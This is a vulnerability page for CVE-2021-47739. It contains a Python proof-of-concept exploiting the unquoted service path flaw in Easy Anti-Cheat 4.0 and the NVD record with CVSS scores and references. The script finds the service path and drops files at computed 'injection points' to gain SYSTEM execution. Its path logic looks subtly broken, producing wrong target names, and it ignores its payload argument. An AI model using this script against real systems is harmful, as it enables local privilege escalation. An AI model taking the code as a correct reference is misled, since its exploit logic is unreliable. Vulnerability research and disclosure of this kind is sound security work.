CVE-2021-47739

# CVE-2021-47739 PoC - Unquoted Service Path Exploitation # Target: Epic Games Easy Anti-Cheat 4.0 # Note: This is for educational and authorized testing purposes only import os import sys import subprocess import shutil def check_unquoted_path(): """Check if Easy Anti-Cheat service has unquoted path vulnerability""" try: # Query service configuration via sc command result = subprocess.run( ['sc', 'qc', 'EasyAntiCheat'], capture_output=True, text=True ) # Parse BINARY_PATH_NAME from output for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f"[+] Service Path: {path}") # Check if path contains spaces and is not quoted if ' ' in path and not path.startswith('"'): print("[!] VULNERABLE: Unquoted path with spaces detected!") return True, path return False, None except Exception as e: print(f"[-] Error checking service: {e}") return False, None def exploit_unquoted_path(malicious_exe_path): """ Exploit unquoted service path by placing malicious executable WARNING: This is for authorized testing only """ # Example: If path is C:\Program Files\Epic Games\eac_service.exe # Attacker can place malicious code at: # C:\Program.exe or C:\Program Files\Easy.exe vulnerable, service_path = check_unquoted_path() if not vulnerable: print("[-] Service path appears to be properly quoted") return False # Extract potential injection points path_parts = service_path.replace('"', '').split('\\') drive = path_parts[0] + '\\' exploit_targets = [] cumulative_path = drive for part in path_parts[1:-1]: cumulative_path += part + '\\' if ' ' in part: exploit_targets.append(cumulative_path + part + '.exe') print(f"[!] Potential injection points found:") for target in exploit_targets: print(f" - {target}") # Copy malicious executable to target location for target in exploit_targets: try: target_dir = os.path.dirname(target) if not os.path.exists(target_dir): os.makedirs(target_dir) # For authorized testing: create a benign marker file with open(target, 'w') as f: f.write('This is a placeholder for authorized testing only') print(f"[+] Created test file at: {target}") print("[*] When service restarts, this executable will run with SYSTEM privileges") return True except PermissionError: print(f"[-] Insufficient permissions to write to: {target}") return False if __name__ == '__main__': print("=" * 60) print("CVE-2021-47739 Easy Anti-Cheat Unquoted Service Path") print("=" * 60) exploit_unquoted_path(None)

{"cve": {"id": "CVE-2021-47739", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:45.893", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Epic Games Easy Anti-Cheat 4.0 contains an unquoted service path vulnerability that allows local non-privileged users to execute arbitrary code with elevated system privileges. Attackers can exploit the service configuration by inserting malicious code in the system root path that would execute with LocalSystem privileges during application startup."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.easy.ac", "source": "[email protected]"}, {"url": "https://www.epicgames.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49841", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/epic-games-easy-anti-cheat-local-privilege-escalation-via-unquoted-service-path", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5652.php", "source": "[email protected]"}]}}